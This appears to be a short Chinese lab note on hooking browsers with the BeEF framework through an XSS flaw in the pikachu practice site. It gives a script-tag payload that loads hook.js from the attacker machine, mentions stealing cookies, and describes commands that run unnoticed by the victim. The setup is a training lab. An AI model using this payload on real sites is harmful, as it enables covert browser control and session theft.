- beef的安装
可以直接安装也可以从源码安装,略 - beef安装好后,打开web登陆页面
http://192.168.102.130:3000/ui/panel
url为kali机地址,可以从配置文件中修改
3.把js加载进存在xss的地方(例pikachu)
payload:
<script src='http://192.168.102.130:3000/hook.js'></script>
可以看到在不停的向102.130发起请求
使用beef中终端发送弹窗
也可以直接获取cookie
总之功能挺多的,慢慢探索吧
在commands选项卡里
绿色:可以在目标浏览器上运行,且用户不会感到任何异常
橙色:可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
灰色:尚未针对此目标进行验证,即不知道能否可运行
红色:不可以执行但是可以尝试一下emm